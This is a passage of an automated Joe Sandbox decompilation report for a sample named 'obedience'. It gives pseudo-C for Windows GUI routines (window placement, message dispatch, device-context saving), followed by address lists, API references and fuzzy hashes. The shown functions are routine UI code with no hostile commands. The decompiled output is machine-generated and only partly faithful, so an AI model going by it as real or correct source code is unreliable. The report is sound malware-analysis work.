      									_t362 =  *0x459e0c; // 0x459e58
      									_t290 = E00403D88( *(_v8 + 4), _t362);
      									__eflags = _t290;
      									if(_t290 != 0) {
      										_t370 =  *(_v8 + 4);
      									}
      								}
      								__eflags = _t370;
      								if(_t370 == 0) {
      									_t313 = E00461FD4() -  *(_v8 + 0x48);
      									__eflags = _t313;
      									_t314 = _t313 >> 1;
      									if(_t313 < 0) {
      										asm("adc ebx, 0x0");
      									}
      									_t277 = E00461FC8() -  *(_v8 + 0x4c);
      									__eflags = _t277;
      									_t278 = _t277 >> 1;
      									if(_t277 < 0) {
      										asm("adc eax, 0x0");
      									}
      								} else {
      									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
      									__eflags = _t317;
      									_t318 = _t317 >> 1;
      									if(_t317 < 0) {
      										asm("adc ebx, 0x0");
      									}
      									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
      									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
      									__eflags = _t286;
      									_t287 = _t286 >> 1;
      									if(_t286 < 0) {
      										asm("adc eax, 0x0");
      									}
      									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
      								}
      								__eflags = _t314;
      								if(_t314 < 0) {
      									_t314 = 0;
      									__eflags = 0;
      								}
      								__eflags = _t278;
      								if(_t278 < 0) {
      									_t278 = 0;
      									__eflags = 0;
      								}
      								_t328 = _t278;
      								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
      								_t281 = _v8;
      								__eflags =  *((char*)(_t281 + 0x57));
      								if( *((char*)(_t281 + 0x57)) != 0) {
      									E0045EB94(_v8, _t328);
      								}
      							}
      						}
      						 *((char*)(_v8 + 0x230)) = 0;
      						if( *((char*)(_v8 + 0x22f)) != 1) {
      							ShowWindow(E0044B158(_v8),  *(0x48ee98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
      						} else {
      							if( *(_v8 + 0x22b) != 2) {
      								ShowWindow(E0044B158(_v8),  *(0x48ee98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
      								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
      								__eflags = _t220;
      								CallWindowProcA(0x407548, E0044B158(_v8), 5, 0, _t220);
      								E00444B88();
      							} else {
      								_t231 = E0044B158(_v8);
      								_t232 =  *0x490b7c; // 0x2481268
      								_t105 = _t232 + 0x44; // 0x0
      								SendMessageA( *( *_t105 + 0x254), 0x223, _t231, 0);
      								ShowWindow(E0044B158(_v8), 3);
      							}
      							_t226 =  *0x490b7c; // 0x2481268
      							_t119 = _t226 + 0x44; // 0x0
      							SendMessageA( *( *_t119 + 0x254), 0x234, 0, 0);
      						}
      					}
      				}
      				_pop(_t331);
      				 *[fs:eax] = _t331;
      				_push(0x460c94);
      				_t154 = _v8;
      				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
      				return _t154;
      			}

      APIs
      • SendMessageA.USER32 ref: 00460AC1
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Similarity
      • API ID: LoadMessageSendString
      • String ID:
      • API String ID: 1946433856-0
      • Opcode ID: 73ea2d5c4c0ef2b079c0237674638869fd581acf0527dbb0ac26a8cbb8ddf6e5
      • Instruction ID: 37ce2b4a73ae6a1b5853b6695998a87bf99b5cb514ed57883eaeb8c138a67e3b
      • Opcode Fuzzy Hash: 73ea2d5c4c0ef2b079c0237674638869fd581acf0527dbb0ac26a8cbb8ddf6e5
      • Instruction Fuzzy Hash: F8F15031A04244EFEB00DBA9C985F5E77F5AB14304F1445BAE5009B3A2E778FE00DB49
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 75%
      			E0044B468(void* __eax) {
      				void* _v28;
      				struct _WINDOWPLACEMENT _v56;
      				struct tagPOINT _v64;
      				intOrPtr _v68;
      				void* _t43;
      				struct HWND__* _t45;
      				struct tagPOINT* _t47;
      
      				_t47 =  &(_v64.y);
      				_t43 = __eax;
      				if(IsIconic( *(__eax + 0x180)) == 0) {
      					GetWindowRect( *(_t43 + 0x180), _t47);
      				} else {
      					_v56.length = 0x2c;
      					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      				}
      				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
      					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
      					if(_t45 != 0) {
      						ScreenToClient(_t45, _t47);
      						ScreenToClient(_t45,  &_v64);
      					}
      				}
      				 *(_t43 + 0x40) = _t47->x;
      				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
      				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
      				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
      				return E00443F7C(_t43);
      			}

      0x0044b46b
      0x0044b46e
      0x0044b47e
      0x0044b4ad
      0x0044b480
      0x0044b480
      0x0044b494
      0x0044b49f
      0x0044b4a0
      0x0044b4a1
      0x0044b4a2
      0x0044b4a2
      0x0044b4c5
      0x0044b4d5
      0x0044b4d9
      0x0044b4dd
      0x0044b4e8
      0x0044b4e8
      0x0044b4d9
      0x0044b4f0
      0x0044b4f7
      0x0044b501
      0x0044b50c
      0x0044b51c

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$ClientLongScreen$IconicPlacementRect
      • String ID: ,
      • API String ID: 2266315723-3772416878
      • Opcode ID: a70d0863ca9d4e10ee8ef8e9fd25834a5cefe88e8f05bbbdcd75466a05b9101d
      • Instruction ID: e299eae4dcb0df41df3ce569a678132f396490dc605855cd552e64c6ced266c9
      • Opcode Fuzzy Hash: a70d0863ca9d4e10ee8ef8e9fd25834a5cefe88e8f05bbbdcd75466a05b9101d
      • Instruction Fuzzy Hash: 82117F71904200ABDB11DF6DC885E9B37E8AF49354F04852AFD58DB282D738ED04CB96
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E0045893C(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				struct HMENU__* _v12;
      				signed int _v16;
      				char _v17;
      				intOrPtr _v24;
      				int _v28;
      				struct HDC__* _v32;
      				intOrPtr _v36;
      				intOrPtr _v40;
      				intOrPtr _v44;
      				intOrPtr* _v48;
      				char _v52;
      				intOrPtr _t137;
      				signed int _t138;
      				intOrPtr _t144;
      				signed int _t150;
      				signed int _t151;
      				intOrPtr* _t153;
      				void* _t158;
      				struct HMENU__* _t160;
      				intOrPtr* _t165;
      				void* _t173;
      				signed int _t177;
      				signed int _t181;
      				void* _t182;
      				void* _t186;
      				void* _t214;
      				void* _t218;
      				struct HDC__* _t221;
      				void* _t251;
      				void* _t253;
      				signed int _t257;
      				void* _t265;
      				signed int _t271;
      				signed int _t272;
      				signed int _t274;
      				signed int _t275;
      				signed int _t277;
      				signed int _t278;
      				signed int _t280;
      				signed int _t281;
      				signed int _t283;
      				signed int _t284;
      				signed int _t286;
      				signed int _t287;
      				signed int _t290;
      				signed int _t291;
      				intOrPtr _t306;
      				intOrPtr _t328;
      				intOrPtr _t337;
      				intOrPtr _t341;
      				intOrPtr* _t348;
      				signed int _t350;
      				intOrPtr* _t351;
      				signed int _t362;
      				signed int _t363;
      				signed int _t364;
      				signed int _t365;
      				signed int _t366;
      				signed int _t367;
      				signed int _t368;
      				intOrPtr* _t370;
      				void* _t372;
      				void* _t373;
      				intOrPtr _t374;
      				void* _t375;
      
      				_t372 = _t373;
      				_t374 = _t373 + 0xffffffd0;
      				_t292 = 0;
      				_v52 = 0;
      				_t370 = __edx;
      				_v8 = __eax;
      				_push(_t372);
      				_push(0x458e6f);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t374;
      				_t137 =  *__edx;
      				_t375 = _t137 - 0x111;
      				if(_t375 > 0) {
      					_t138 = _t137 - 0x117;
      					__eflags = _t138;
      					if(_t138 == 0) {
      						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
      						__eflags = _t271;
      						if(_t271 < 0) {
      							goto L67;
      						} else {
      							_t272 = _t271 + 1;
      							_t362 = 0;
      							__eflags = 0;
      							while(1) {
      								_t150 = E00457CB8(E00419C84(_v8, _t292, _t362),  *(_t370 + 4), __eflags);
      								__eflags = _t150;
      								if(_t150 != 0) {
      									goto L68;
      								}
      								_t362 = _t362 + 1;
      								_t272 = _t272 - 1;
      								__eflags = _t272;
      								if(_t272 != 0) {
      									continue;
      								} else {
      									goto L67;
      								}
      								goto L68;
      							}
      						}
      					} else {
      						_t151 = _t138 - 8;
      						__eflags = _t151;
      						if(_t151 == 0) {
      							_v17 = 0;
      							__eflags =  *(__edx + 6) & 0x00000010;
      							if(( *(__edx + 6) & 0x00000010) != 0) {
      								_v17 = 1;
      							}
      							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
      							__eflags = _t274;
      							if(__eflags < 0) {
      								L32:
      								_t153 =  *0x48f840; // 0x490b7c
      								E00464FF0( *_t153, 0, __eflags);
      								goto L67;
      							} else {
      								_t275 = _t274 + 1;
      								_t363 = 0;
      								__eflags = 0;
      								while(1) {
      									__eflags = _v17 - 1;
      									if(_v17 != 1) {
      										_v12 =  *(_t370 + 4) & 0x0000ffff;
      									} else {
      										_t160 =  *(_t370 + 8);
      										__eflags = _t160;
      										if(_t160 == 0) {
      											_v12 = 0xffffffff;
      										} else {
      											_v12 = GetSubMenu(_t160,  *(_t370 + 4) & 0x0000ffff);
      										}
      									}
      									_t158 = E00419C84(_v8, _t292, _t363);
      									_t292 = _v17;
      									_v16 = E00457BFC(_t158, _v17, _v12);
      									__eflags = _v16;
      									if(__eflags != 0) {
      										break;
      									}
      									_t363 = _t363 + 1;
      									_t275 = _t275 - 1;
      									__eflags = _t275;
      									if(__eflags != 0) {
      										continue;
      									} else {
      										goto L32;
      									}
      									goto L68;
      								}
      								E00441A70( *((intOrPtr*)(_v16 + 0x58)), _t292,  &_v52, __eflags);
      								_t165 =  *0x48f840; // 0x490b7c
      								E00464FF0( *_t165, _v52, __eflags);
      							}
      						} else {
      							__eflags = _t151 == 1;
      							if(_t151 == 1) {
      								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
      								__eflags = _t277;
      								if(_t277 < 0) {
      									goto L67;
      								} else {
      									_t278 = _t277 + 1;
      									_t364 = 0;
      									__eflags = 0;
      									while(1) {
      										_v48 = E00419C84(_v8, _t292, _t364);
      										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
      										__eflags = _t173 -  *(_t370 + 8);
      										if(_t173 ==  *(_t370 + 8)) {
      											break;
      										}
      										_t292 = 1;
      										_t177 = E00457BFC(_v48, 1,  *(_t370 + 8));
      										__eflags = _t177;
      										if(_t177 == 0) {
      											_t364 = _t364 + 1;
      											_t278 = _t278 - 1;
      											__eflags = _t278;
      											if(_t278 != 0) {
      												continue;
      											} else {
      												goto L67;
      											}
      										} else {
      											break;
      										}
      										goto L68;
      									}
      									E0045852C(_v48, _t370);
      								}
      							} else {
      								goto L67;
      							}
      						}
      					}
      					goto L68;
      				} else {
      					if(_t375 == 0) {
      						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
      						__eflags = _t280;
      						if(_t280 < 0) {
      							goto L67;
      						} else {
      							_t281 = _t280 + 1;
      							_t365 = 0;
      							__eflags = 0;
      							while(1) {
      								E00419C84(_v8, _t292, _t365);
      								_t181 = E00457C9C( *(_t370 + 4), __eflags);
      								__eflags = _t181;
      								if(_t181 != 0) {
      									goto L68;
      								}
      								_t365 = _t365 + 1;
      								_t281 = _t281 - 1;
      								__eflags = _t281;
      								if(_t281 != 0) {
      									continue;
      								} else {
      									goto L67;
      								}
      								goto L68;
      							}
      						}
      						goto L68;
      					} else {
      						_t182 = _t137 - 0x2b;
      						if(_t182 == 0) {
      							_v40 =  *((intOrPtr*)(__edx + 8));
      							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
      							__eflags = _t283;
      							if(_t283 < 0) {
      								goto L67;
      							} else {
      								_t284 = _t283 + 1;
      								_t366 = 0;
      								__eflags = 0;
      								while(1) {
      									_t186 = E00419C84(_v8, _t292, _t366);
      									_t292 = 0;
      									_v16 = E00457BFC(_t186, 0,  *((intOrPtr*)(_v40 + 8)));
      									__eflags = _v16;
      									if(_v16 != 0) {
      										break;
      									}
      									_t366 = _t366 + 1;
      									_t284 = _t284 - 1;
      									__eflags = _t284;
      									if(_t284 != 0) {
      										continue;
      									} else {
      										goto L67;
      									}
      									goto L69;
      								}
      								_v24 = E00426448(0, 1);
      								_push(_t372);
      								_push(0x458ca2);
      								_push( *[fs:eax]);
      								 *[fs:eax] = _t374;
      								_v28 = SaveDC( *(_v40 + 0x18));
      								_push(_t372);
      								_push(0x458c85);
      								_push( *[fs:eax]);
      								 *[fs:eax] = _t374;
      								E00426B80(_v24,  *(_v40 + 0x18));
      								E00426A20(_v24);
      								E00459114(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
      								_pop(_t328);
      								 *[fs:eax] = _t328;
      								_push(0x458c8c);
      								__eflags = 0;
      								E00426B80(_v24, 0);
      								return RestoreDC( *(_v40 + 0x18), _v28);
      							}
      						} else {
      							_t214 = _t182 - 1;
      							if(_t214 == 0) {
      								_v44 =  *((intOrPtr*)(__edx + 8));
      								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
      								__eflags = _t286;
      								if(_t286 < 0) {
      									goto L67;
      								} else {
      									_t287 = _t286 + 1;
      									_t367 = 0;
      									__eflags = 0;
      									while(1) {
      										_t218 = E00419C84(_v8, _t292, _t367);
      										_t292 = 0;
      										_v16 = E00457BFC(_t218, 0,  *((intOrPtr*)(_v44 + 8)));
      										__eflags = _v16;
      										if(_v16 != 0) {
      											break;
      										}
      										_t367 = _t367 + 1;
      										_t287 = _t287 - 1;
      										__eflags = _t287;
      										if(_t287 != 0) {
      											continue;
      										} else {
      											goto L67;
      										}
      										goto L69;
      									}
      									_t221 =  *((intOrPtr*)(_v8 + 0x10));
      									L00407768();
      									_v32 = _t221;
      									 *[fs:eax] = _t374;
      									_v24 = E00426448(0, 1);
      									 *[fs:eax] = _t374;
      									_v28 = SaveDC(_v32);
      									 *[fs:eax] = _t374;
      									E00426B80(_v24, _v32);
      									E00426A20(_v24);
      									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x458da3, _t372,  *[fs:eax], 0x458dc0, _t372,  *[fs:eax], 0x458de5, _t372, _t221);
      									_pop(_t337);
      									 *[fs:eax] = _t337;
      									_push(0x458daa);
      									__eflags = 0;
      									E00426B80(_v24, 0);
      									return RestoreDC(_v32, _v28);
      								}
      							} else {
      								if(_t214 == 0x27) {
      									_v36 =  *((intOrPtr*)(__edx + 8));
      									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
      									__eflags = _t290;
      									if(_t290 < 0) {
      										goto L67;
      									} else {
      										_t291 = _t290 + 1;
      										_t368 = 0;
      										__eflags = 0;
      										while(1) {
      											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00419C84(_v8, _t292, _t368))) + 0x34))();
      											_t341 = _v36;
      											__eflags = _t251 -  *((intOrPtr*)(_t341 + 0xc));
      											if(_t251 !=  *((intOrPtr*)(_t341 + 0xc))) {
      												_t253 = E00419C84(_v8, _t292, _t368);
      												_t292 = 1;
      												_v16 = E00457BFC(_t253, 1,  *((intOrPtr*)(_v36 + 0xc)));
      											} else {
      												_v16 =  *((intOrPtr*)(E00419C84(_v8, _t292, _t368) + 0x34));
      											}
      											__eflags = _v16;
      											if(_v16 != 0) {
      												break;
      											}
      											_t368 = _t368 + 1;
      											_t291 = _t291 - 1;
      											__eflags = _t291;
      											if(_t291 != 0) {
      												continue;
      											} else {
      												goto L67;
      											}
      											goto L68;
      										}
      										_t257 = E00457C2C(E00419C84(_v8, _t292, _t368), 1,  *((intOrPtr*)(_v36 + 8)));
      										__eflags = _t257;
      										if(_t257 == 0) {
      											_t265 = E00419C84(_v8, 1, _t368);
      											__eflags = 0;
      											_t257 = E00457C2C(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
      										}
      										_t348 =  *0x48f9b8; // 0x490b80
      										_t56 =  *_t348 + 0x6c; // 0x0
      										_t350 =  *_t56;
      										__eflags = _t350;
      										if(_t350 != 0) {
      											__eflags = _t257;
      											if(_t257 == 0) {
      												_t257 =  *(_t350 + 0x158);
      											}
      											__eflags =  *(_t350 + 0x228) & 0x00000008;
      											if(( *(_t350 + 0x228) & 0x00000008) == 0) {
      												_t351 =  *0x48f840; // 0x490b7c
      												E00464C64( *_t351, _t291, _t257, _t368, _t370);
      											} else {
      												E00464CEC();
      											}
      										}
      									}
      								} else {
      									L67:
      									_push( *(_t370 + 8));
      									_push( *(_t370 + 4));
      									_push( *_t370);
      									_t144 =  *((intOrPtr*)(_v8 + 0x10));
      									_push(_t144);
      									L00407550();
      									 *((intOrPtr*)(_t370 + 0xc)) = _t144;
      								}
      								L68:
      								_pop(_t306);
      								 *[fs:eax] = _t306;
      								_push(0x458e76);
      								return E00404A40( &_v52);
      							}
      						}
      					}
      				}
      				L69:
      			}

      0x0045893d
      0x0045893f
      0x00458945
      0x00458947
      0x0045894a
      0x0045894c
      0x00458951
      0x00458952
      0x00458957
      0x0045895a
      0x0045895d
      0x0045895f
      0x00458964
      0x00458986
      0x00458986
      0x0045898b
      0x004589da
      0x004589db
      0x004589dd
      0x00000000
      0x004589e3
      0x004589e3
      0x004589e4
      0x004589e4
      0x004589e6
      0x004589f3
      0x004589f8
      0x004589fa
      0x00000000
      0x00000000
      0x00458a00
      0x00458a01
      0x00458a01
      0x00458a02
      0x00000000
      0x00458a04
      0x00000000
      0x00458a04
      0x00000000
      0x00458a02
      0x004589e6
      0x0045898d
      0x0045898d
      0x0045898d
      0x00458990
      0x00458a09
      0x00458a0d
      0x00458a11
      0x00458a13
      0x00458a13
      0x00458a1d
      0x00458a1e
      0x00458a20
      0x00458a96
      0x00458a96
      0x00458a9f
      0x00000000
      0x00458a22
      0x00458a22
      0x00458a23
      0x00458a23
      0x00458a25
      0x00458a25
      0x00458a29
      0x00458a4f
      0x00458a2b
      0x00458a2b
      0x00458a2e
      0x00458a30
      0x00458a42
      0x00458a32
      0x00458a3d
      0x00458a3d
      0x00458a30
      0x00458a57
      0x00458a5c
      0x00458a67
      0x00458a6a
      0x00458a6e
      0x00000000
      0x00000000
      0x00458a92
      0x00458a93
      0x00458a93
      0x00458a94
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00458a94
      0x00458a79
      0x00458a81
      0x00458a88
      0x00458a88
      0x00458992
      0x00458992
      0x00458993
      0x00458dfc
      0x00458dfd
      0x00458dff
      0x00000000
      0x00458e01
      0x00458e01
      0x00458e02
      0x00458e02
      0x00458e04
      0x00458e0e
      0x00458e16
      0x00458e19
      0x00458e1c
      0x00000000
      0x00000000
      0x00458e21
      0x00458e26
      0x00458e2b
      0x00458e2d
      0x00458e3b
      0x00458e3c
      0x00458e3c
      0x00458e3d
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00458e2d
      0x00458e34
      0x00458e34
      0x00458999
      0x00000000
      0x00458999
      0x00458993
      0x00458990
      0x00000000
      0x00458966
      0x00458966
      0x004589a4
      0x004589a5
      0x004589a7
      0x00000000
      0x004589ad
      0x004589ad
      0x004589ae
      0x004589ae
      0x004589b0
      0x004589b5
      0x004589be
      0x004589c3
      0x004589c5
      0x00000000
      0x00000000
      0x004589cb
      0x004589cc
      0x004589cc
      0x004589cd
      0x00000000
      0x004589cf
      0x00000000
      0x004589cf
      0x00000000
      0x004589cd
      0x004589b0
      0x00000000
      0x00458968
      0x00458968
      0x0045896b
      0x00458bae
      0x00458bb7
      0x00458bb8
      0x00458bba
      0x00000000
      0x00458bc0
      0x00458bc0
      0x00458bc1
      0x00458bc1
      0x00458bc3
      0x00458bc8
      0x00458bd3
      0x00458bda
      0x00458bdd
      0x00458be1
      0x00000000
      0x00000000
      0x00458ca9
      0x00458caa
      0x00458caa
      0x00458cab
      0x00000000
      0x00458cb1
      0x00000000
      0x00458cb1
      0x00000000
      0x00458cab
      0x00458bf3
      0x00458bf8
      0x00458bf9
      0x00458bfe
      0x00458c01
      0x00458c10
      0x00458c15
      0x00458c16
      0x00458c1b
      0x00458c1e
      0x00458c2a
      0x00458c3f
      0x00458c58
      0x00458c5f
      0x00458c62
      0x00458c65
      0x00458c6a
      0x00458c6f
      0x00458c84
      0x00458c84
      0x00458971
      0x00458971
      0x00458972
      0x00458cb9
      0x00458cc2
      0x00458cc3
      0x00458cc5
      0x00000000
      0x00458ccb
      0x00458ccb
      0x00458ccc
      0x00458ccc
      0x00458cce
      0x00458cd3
      0x00458cde
      0x00458ce5
      0x00458ce8
      0x00458cec
      0x00000000
      0x00000000
      0x00458dec
      0x00458ded
      0x00458ded
      0x00458dee
      0x00000000
      0x00458df4
      0x00000000
      0x00458df4
      0x00000000
      0x00458dee
      0x00458cf5
      0x00458cf9
      0x00458cfe
      0x00458d0c
      0x00458d1b
      0x00458d29
      0x00458d35
      0x00458d43
      0x00458d4c
      0x00458d61
      0x00458d7b
      0x00458d80
      0x00458d83
      0x00458d86
      0x00458d8b
      0x00458d90
      0x00458da2
      0x00458da2
      0x00458978
      0x0045897b
      0x00458aac
      0x00458ab5
      0x00458ab6
      0x00458ab8
      0x00000000
      0x00458abe
      0x00458abe
      0x00458abf
      0x00458abf
      0x00458ac1
      0x00458acd
      0x00458ad0
      0x00458ad3
      0x00458ad6
      0x00458aef
      0x00458afa
      0x00458b01
      0x00458ad8
      0x00458ae5
      0x00458ae5
      0x00458b04
      0x00458b08
      0x00000000
      0x00000000
      0x00458b9e
      0x00458b9f
      0x00458b9f
      0x00458ba0
      0x00000000
      0x00458ba6
      0x00000000
      0x00458ba6
      0x00000000
      0x00458ba0
      0x00458b20
      0x00458b25
      0x00458b27
      0x00458b2e
      0x00458b39
      0x00458b3b
      0x00458b3b
      0x00458b40
      0x00458b48
      0x00458b48
      0x00458b4b
      0x00458b4d
      0x00458b53
      0x00458b55
      0x00458b5c
      0x00458b5c
      0x00458b68
      0x00458b6f
      0x00458b8b
      0x00458b94
      0x00458b71
      0x00458b81
      0x00458b81
      0x00458b6f
      0x00458b4d
      0x00458981
      0x00458e3f
      0x00458e42
      0x00458e46
      0x00458e49
      0x00458e4d
      0x00458e50
      0x00458e51
      0x00458e56
      0x00458e56
      0x00458e59
      0x00458e5b
      0x00458e5e
      0x00458e61
      0x00458e6e
      0x00458e6e
      0x00458972
      0x0045896b
      0x00458966
      0x00000000

      APIs
      • SaveDC.GDI32(?), ref: 00458C0B
      • RestoreDC.GDI32(?,?), ref: 00458C7F
      • 73BEB080.USER32(?,00000000,00458E6F), ref: 00458CF9
      • SaveDC.GDI32(?), ref: 00458D30
      • RestoreDC.GDI32(?,?), ref: 00458D9D
      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00458E6F), ref: 00458E51
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: RestoreSave$B080NtdllProc_Window
      • String ID:
      • API String ID: 4024241980-0
      • Opcode ID: 220435ccf59b5a208c08e6b2ee9c267569ab4683f73b980dac452d85e1d94dc8
      • Instruction ID: 8431f3ec98f4d46109bfef44b14c3c17a4ea528e88fb031c415560bdb8fb9393
      • Opcode Fuzzy Hash: 220435ccf59b5a208c08e6b2ee9c267569ab4683f73b980dac452d85e1d94dc8
      • Instruction Fuzzy Hash: EAE14A74A042059FDB10EFA9C88199EB7F5FF88305B21856AE805E7362DF38ED45CB58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 92%
      			E0045DB80(intOrPtr __eax, struct HWND__** __edx) {
      				intOrPtr _v8;
      				int _v12;
      				intOrPtr _v16;
      				struct HDC__* _v20;
      				struct HWND__* _v24;
      				void* __ebp;
      				struct HWND__* _t92;
      				intOrPtr _t112;
      				intOrPtr _t115;
      				struct HWND__* _t121;
      				struct HWND__* _t124;
      				intOrPtr _t128;
      				struct HWND__* _t129;
      				intOrPtr _t130;
      				intOrPtr _t131;
      				struct HWND__* _t133;
      				struct HWND__* _t136;
      				intOrPtr _t142;
      				intOrPtr _t172;
      				struct HDC__* _t177;
      				struct HWND__** _t200;
      				struct HWND__* _t218;
      				struct HWND__* _t219;
      				intOrPtr _t228;
      				void* _t230;
      				void* _t231;
      				intOrPtr _t237;
      				intOrPtr _t245;
      				struct HWND__* _t249;
      				struct HWND__* _t250;
      				struct HWND__* _t255;
      				struct HWND__* _t256;
      				void* _t258;
      				void* _t260;
      				intOrPtr _t261;
      				void* _t263;
      				void* _t267;
      
      				_t258 = _t260;
      				_t261 = _t260 + 0xffffffec;
      				_t200 = __edx;
      				_v8 = __eax;
      				_t92 =  *__edx;
      				_t218 = _t92;
      				_t263 = _t218 - 0x46;
      				if(_t263 > 0) {
      					_t219 = _t218 - 0xb01a;
      					__eflags = _t219;
      					if(_t219 == 0) {
      						__eflags =  *(_v8 + 0xa0);
      						if(__eflags != 0) {
      							E00403DF8(_v8, __eflags);
      						}
      					} else {
      						__eflags = _t219 == 1;
      						if(_t219 == 1) {
      							__eflags =  *(_v8 + 0xa0);
      							if(__eflags != 0) {
      								E00403DF8(_v8, __eflags);
      							}
      						} else {
      							goto L41;
      						}
      					}
      					goto L43;
      				} else {
      					if(_t263 == 0) {
      						_t112 = _v8;
      						_t228 =  *0x45dfb4; // 0x1
      						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x45dfb0);
      						if(_t228 == ( *(_t112 + 0x1c) &  *0x45dfb0)) {
      							_t115 = _v8;
      							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
      							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
      								_t128 = _v8;
      								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
      								if( *((char*)(_t128 + 0x22b)) != 2) {
      									_t129 = __edx[2];
      									_t26 = _t129 + 0x18;
      									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
      									__eflags =  *_t26;
      								}
      							}
      							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
      							__eflags = _t121;
      							if(_t121 == 0) {
      								L30:
      								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
      								__eflags = _t124;
      								if(_t124 == 0) {
      									L32:
      									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
      								} else {
      									__eflags = _t124 == 3;
      									if(_t124 == 3) {
      										goto L32;
      									}
      								}
      							} else {
      								__eflags = _t121 == 2;
      								if(_t121 == 2) {
      									goto L30;
      								}
      							}
      						}
      						goto L43;
      					} else {
      						_t230 = _t218 + 0xfffffffa - 3;
      						if(_t230 < 0) {
      							__eflags =  *0x48ee24;
      							if( *0x48ee24 != 0) {
      								__eflags =  *__edx - 7;
      								if( *__edx != 7) {
      									goto L43;
      								} else {
      									_t130 = _v8;
      									__eflags =  *(_t130 + 0x1c) & 0x00000010;
      									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
      										goto L43;
      									} else {
      										_t255 = 0;
      										_t131 = _v8;
